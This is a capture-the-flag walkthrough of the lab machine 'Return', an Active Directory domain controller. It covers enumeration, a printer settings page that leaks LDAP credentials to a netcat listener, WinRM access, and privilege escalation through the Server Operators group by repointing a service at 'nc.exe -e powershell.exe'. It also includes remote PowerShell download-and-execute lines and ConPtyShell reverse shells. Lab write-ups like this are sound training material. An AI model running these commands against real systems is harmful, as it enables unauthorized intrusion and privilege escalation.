💥Cyb3rBook

Search

SearchSearch

RETURN

Apr 10, 202522 min read

PRIMARY CATEGORY → EASY

Summary

  • SMB Enumeration (Netexec)
  • DNS Enumeration (Dig)
  • Kerberos User Enumeration (Kerbrute)
  • Trying an AS-REP Roasting Attack (GetNPUsers)
  • Failed RPC Enumeration
  • Fuzzing Web Content using Feroxbuster
  • Fuzzing Virtual Hosts using Gobuster
  • Information Disclosure (Password) via an HTTP Form Request
  • Using Evil-WinRM to establish a connection to the Target via WinRM
  • Local Privesc though the Server Operators Security Group
  • Shell Upgrade to a Fully Interactive TTY (ConPtyShell)

Setup

Directory creation with the Machine’s Name

mkdir Return && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

mkt

Recon

OS Identification

First, proceed to identify the Target Operative System. This can be done by a simple ping taking into account the TTL Unit

The standard values are →

  • About 64 → Linux
  • About 128 → Windows
ping -c1 10.129.95.241

As mentioned, according to the TTL, It seems that It is a Windows Target

Port Scanning
General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.95.241

Open Ports

53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 9389, 47001, 49664, 49665, 49666, 49667, 49671, 49674, 49675, 49676, 49680, 49688 and 49698
Comprehensive Scan

The ExtractPorts utility is used to get a Readable Summary of the previous scan and have all Open Ports copied to the clipboard

extractPorts allPorts

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49680,49688,49698 -sCV -n -Pn --disable-arp-ping -oN targeted 10.129.95.241

We see ports related to services such as LDAP, Kerberos and DNS . Therefore, we can assume that we are dealing with a DC (Domain Controller)

Note that this type of servers has many open ports as an Active Directory deploys a large number of services

So, let’s keep calm and go step by step listing all the ports and their related services

139, 445 - SMB
Extraction of General Information

With the Domain Controllers and Windows machines, one thing that I like to do before anything else is to use netexec to connect via smb to the target and extract some information such as the Host Name, the Domain name (In case It is a DC) and if the target has the SMB Signing enabled and whether it uses SMBv1

nxc smb 10.129.95.241

And we got that the machine’s name is Printer and the domain is return.local

Moreover, we now know that the Machines’s OS is likely to be a Windows Server 2019

Since we have a valid domain name and a host name, let’s add them to the /etc/hosts file to refer to the IP Address we have

printf "\n10.129.95.241\tprinter\treturn.local\tprinter.return.local" >> /etc/hosts
List Shared Resources

We can try to list the available SMB shares, if there are any, using netexec again

Since we do not have any valid credentials, let’s try a Null Authentication as follows

nxc smb printer --username '' --password '' --shares

It gives us an STATUS_ACCESS_DENIED, so we know that Null Authentication is not enabled

We could try to authenticate with a random username

nxc smb printer --username 'anyRandomUser' --password '' --shares

The same story here…

Let’s check if the Guest user is enabled in the target

nxc smb printer --username 'guest' --password '' --shares

And It is not!

So, there is no more we can really carry out here until we have some valid credentials

Let’s move on to the next service!

53 - DNS

The Domain Controller is usually the DNS Resolver of the Domain Client Machines

We can start trying to list the version of this DNS Server as follows

dig CHAOS TXT version.bind @10.129.95.241 +noall +answer

But we got a timeout from the DC

We can try to perform a DNS Zone Transfer Attack, so that we can obtain all the DNS Records of the DNS Zone of a specific domain

dig axfr return.local @10.129.95.241 +noall +answer

As we can see, the Zone Transfer failed 😅

But if we use dig with the ANY directive to try to get any DNS Records from the same DNS Zone related to a certain domain

dig ANY return.local @10.129.95.241 +noall +answer

And we have some interesting DNS Records such as printer.return.local and hostmaster.return.local

Let’s add them to the /etc/hosts file

printf "\tprinter.return.local\thostmaster.return.local" >> /etc/hosts

Since port 80 related to a Web Server is open, we can think that it may be using Virtual Hosts in IIS

Therefore, It would not be the same to request an HTTP Resource using the Host Header with the value return.local instead of using hostmaster.return.local

88 - Kerberos

When I see that the Kerberos services is exposed from the Domain Controller, I start to think of attack vectors such as AS_REPRoast or Kerberoasting

We must know any existing username in the DN to be able to perform both attacks

Right now we do not have anyone, but we can use tools such as kerbrute in order to list any valid username in the target

User Enumeration via Kerbrute

Reference

First of all, git clone the repository and compile the Go source code as follows →

git clone "https://github.com/ropnop/kerbrute" kerbrute
cd !$ && go build -ldflags "-s -w" -o kerbrute .

Once the above is done, we can use kerbrute’s usernum module to try to list any valid username according to a given wordlist

./kerbrute userenum --dc printer --domain return.local /usr/share/seclist/Usernames/xato-net-10-million-usernames.txt

If we let this scan running in the background while we continue with the remaning enumeration, we get the following results

We have two valid usernames, the administrator user always exists, as it happens with root on a Linux Machine, but the user printer is an interesting one

AS_Rep Roasting

We can create a file which contains this users and perform an ASREPRoast attack

printf "%s\n" "printer" > users.txt

Then, just use GetNPusers.py from Impacket to check if any of the users within the provided file has the UF_DONT_REQUIRE_PREAUTH attribute enabled

The client first sends an AS_REQ without Preauth to the AS (Application Service) of the KDC (Key Distribution Center)

Then the KDC checks if the requested user has the UF_DONT_REQUIRE_PREAUTH attribute enabled

If not, it replies with the following error → eRR-PREAUTH-REQUIRED and the client has to send again an ASP_REQ but this time with a timestamp encrypted with the derived key of the given username

But, if the user has the above attribute enabled, then the AS replies with an AS_REP which contains two encrypted sections →

  • Enc Data

Data Chunk (Session Key, Timestamps and User Information) encrypted with the user’s NTLMv1 hash (MD4) using RC4-HMAC or with a PBKDF2-SHA1 derived key from the user’s NTLMv1 hash using AES-{128,256}

  • TGT

The Ticket Granting Ticket of the user which is encrypted, like the Enc Data, using RC4 with the user’s NTLMv1 hash as symmetric key or using AES-256 having previously derived the NTLMv1 hash via PBKDF2-SHA1

In this case, we obtains the following output →

[-] User printer doesn't have UF_DONT_REQUIRE_PREAUTH set

Therefore, we know that the attribute is not enabled for this user and we have then received the error eRR-PREAUTH-REQUIRED

tshark --interface tun0 -Y "tcp.port == 88" 2> /dev/null

The error code can be extracted as follows →

tshark --interface tun0 -Tfields -e kerberos.error_code -Y "tcp.port == 88" 2> /dev/null

So, we can do nothing more here as we do not know any more existing usernames and we do not have any valid credentials for any user to perform a Kerberoasting Attack

135 - RCP

The port 135 related to the RPC Endpoint Mapper is open

As we did in the SMB Section, we can try to authenticate using a Null Session

rpcclient --user '' --no-pass --command 'srvinfo' printer

But we receive again an error NT_STATUS_ACCESS_DENIED as responde

The same applies if we try it with a random user

rpcclient --user 'anyRandomUser' --no-pass --command 'srvinfo' printer

This time we get LOGON_FAILURE since the user does not exist in the target

Lastly, we could check if the guest account is enabled, but we already verified it before using SMB

rpcclient --user 'guest%' --command 'srvinfo' printer
80 - HTTP

We check the HTTP Response Headers using curl

curl --silent --request GET --location --head "http://10.129.95.241"

According to the above headers, we know that the Web Server is a Microsoft IIS and the Server-Side Language Programming is PHP

Browser-Based Inspection

If we inspect the source code of the index.php resource, there is nothing interesting

  • Index.php

Apart from the index.php resource, there is a settings.php, the remaining menu sections such as Fax and Troubleshooting are not working

  • Settings.php

Before inspect the functionality of the above PHP script, let’s apply fuzzing to discover resources such as directories or another PHP files

Fuzzing

To show different tools, we will use feroxbuster for the directory enumeration and gobuster for the PHP files enumeration

  • Only Directories

Reference

feroxbuster --add-slash --threads 200 --output WebScan_directories --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url http://10.129.95.241

Nothing interesting here

  • Directories and PHP Files

Reference

gobuster dir --threads 200 --output fullWebScan --extensions php --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url http://10.129.95.241

Nothing interesting here either

Remember that we discovered some subdomains when we listed the DNS service and mentioned that Virtual Hosting could be implemented by the Web Server

  • printer.return.local

  • hostmaster.return.local

In this case It does not apply, both subdomains offer the same content as the following URLhttp://10.129.95.241

We could perform a Virtual Host enumeration using gobuster

gobuster vhost --append-domain --domain return.local --threads 200 --output vHostScan --wordlist /usr/share/seclist/Discovery/DNS/subdomains-top1million-110000.txt --url http://10.129.95.241

But we got nothing

Therefore, let’s inspect further the settings.php’s form

It seems that the Password field is filled with a string, we could try to inspect the HTML source code and modify the type attribute of the input tag from password to text in order to see the password in plain text

But the value of the type attribute is already text, so we cannot do anything here

Let’s use Burpsuite to intercept the request sent when the Update button is clicked

Only one parameter is sent in the POST HTTP RequestIP

We could try to set the value of this POST Parameter to our IP Address having previously set up a listener on port 389

I have said port 389 because is the default port that appears in the Server Port field in settings.php

nc -nlvp 389

The last strings seems to be the value of the Password field as this field is the last one in the settings.php form

User → svc-printer

Password → 1edFg43012!!

We have another valid user, but, before proceeding to perform again, for this user, an AS_REP Roast attack, let’s see if we can authenticate with him in the DC using the previous password

nxc smb printer --username 'svc-printer' --password '1edFg43012!!'

And we can! So this password is valid for the user svc-printer

Shell as System User via WinRM

Reference

Since port 5985, related to WinRM, is open, let’s check if this user belongs to the Remote Management Users group and then we can connect to the DC using Evil-WinRM

We can also carry out the above validation using netexec and its winrm module

nxc winrm printer --username 'svc-printer' --password '1edFg43012!!'

And so can we. So use Evil-WinRM as follows to connect to the target

evil-winrm --ip 10.129.95.241 --user 'svc-printer' --password '1edFg43012!!'

And we’re in! Now, we can go to the Desktop folder of the current user and grab the flag user.txt content

Get-Content C:\Users\svc-printer\Desktop\user.txt

Privesc #1

Initial Non-Privileged User → svc-printer

Server Operators

Once inside, before we proceed to inspect the File System and look for sensitive files or CVEs related to the software installed in the target and located in the Program Files and Program Files (x86) folders, let’s see what privileges the current user has and to which groups the user belongs

whoami /groups
whoami /priv

And the current user is member of the Server Operators group

Reference

A user which belongs to this AD Security Group (Builtin Group) can perform actions such as →

  • Sign in to the Domain Controller

  • Create and Delete Network Shared Resources

  • Stop and Start Services

  • Backup and Restore Files

Among other actions…

Therefore, since we do not have enough privileges to list the services available on the target, we can leverage of Evil-WinRM commands, such as services, in order to list all running services and their binary path

services

As we belong to the Server Operators Security Group, we can modify the binary path of a running service

When we restart that service, It will run its associated binary, in this case, the one that we have specified

Thus, we can upload a netcat binary to the target and refer to it when modifying the path of a particular service

This time, we will use SMBServer.py from Impacket to share the binary and copy it from the DC

Binary Transfer to the Target via SMB
  • From the Attacker ⚔️
smbserver.py -smb2support -user 4l3xbb -password 4l3xbb test $(pwd)
  • From the Target 🎯
net use Z: \\10.10.16.24\smbFolder /USER:al3xbb al3xbb
Copy-Item -Path 'Z:\nc.exe' -Destination 'C:\ProgramData\nc.exe'
Modification of a Service’s Binary Path

Once we have uploaded the nc.exe binary to the target, just proceed as follows to modify the binary path of the services mentioned above, e.g. the VMTools service

sc.exe config VMTools binPath="C:\ProgramData\nc.exe -e powershell.exe 10.10.16.24 443"

If we run again the services command, we see that the binary path related to the above service has been modified correctly

services
Set the Listener and Restart the Service to get Remote Access

Note that we have specified that the netcat binary sends a powershell.exe instance to our listening port

Therefore, before proceed to restart the VMTools service, set the listener on the attacking machine

rlwrap -CaR nc -nlvp 443

Then, from the target, stop and restart the service

sc.exe stop VMTools
sc.exe start VMTools

And now we have access, but there is a problem with this reverse shell, since the service is being launched running the netcat binary that we have uploaded to the target, it fails after a few seconds and the shell we receive hangs out

Getting a Persistent and Fully Interactive Shell

Thefore, I would recommend, before launch the service, to prepare the following command to associate a Logical Unit to the SMB Server we have as we did before

net use X: \\10.10.16.24\smbFolder /USER:4l3xbb 4l3xbb

And run the netcat binary directly from the share specifying another listening port

So, proceed as follows →

  • From the Attacker ⚔️
rlwrap -CaR nc -nlvp 1234
  • From the Target 🎯

Again, stop and start the service

sc.exe stop VMTools
sc.exe start VMTools

Then, we receive the first reverse connection from the launched service

Quickly proceed as follows to associate a shared folder to a local drive and remotely run the netcat binary

net use Y: \\10.10.16.24\smbFolder /USER:4l3xbb 4l3xbb
Y:\nc.exe -e powershell.exe 10.10.16.24 1234

We now have a persistent shell and not a volatile one

But, we need to upgrade it to a Fully Interactive TTY as the shell we have now will die if we press C-c to interrupt a process created from the shell we have

So, we can use ConPtyShell to achieve this task

Basically we need to import a powershell module called Invoke-ConPtyShell.ps1, which uses a function called CreatePseudoConsole(), which is availabe since Windows 10 and Windows Server 2019 version 1809 (build 10.0.17763)

Therefore, let’s check if the target’s OS version is more recent than the ones listed above

systeminfo | Select-String -Pattern 'OS\s(Name|Version)'

And it is! In fact It is the same as above

Proceed as follows to upgrade it using ConPtyShell

  • From the Attacker ⚔️

Reference

Git clone the repository and set up a Simple HTTP Server with python in order to transfer the powershell module to the target

git clone https://github.com/antonioCoco/ConPtyShell ConPtyShell
cd !$ && python3 -m http.server 8888
  • From the Target 🎯

Request the shared resource from the target

IEX (New-Object Net.WebClient).downloadString('http://10.10.16.24:8888/Invoke-ConPtyShell.ps1')
  • From the Attacker ⚔️

Get the rows and columns number of the current terminal

stty size

Then, set up a listening port and wait for the connections to be received

nc -nlvp 443
  • From the Target 🎯

Pass the following parameters to the powershell function to send the reverse shell to the attacker

Invoke-ConPtyShell -RemoteIp 10.10.16.25 -RemotePort 443 -Rows 61 -Cols 248

Finally, proceed as follows →

Attacker
C-z
stty raw -echo ; fg
Enter

And that’s it! We have a Fully Interactive TTY

It only remains to get the content of the flag root.txt 😊

Get-Content C:\Users\Administrator\Desktop\root.txt

Graph View

Backlinks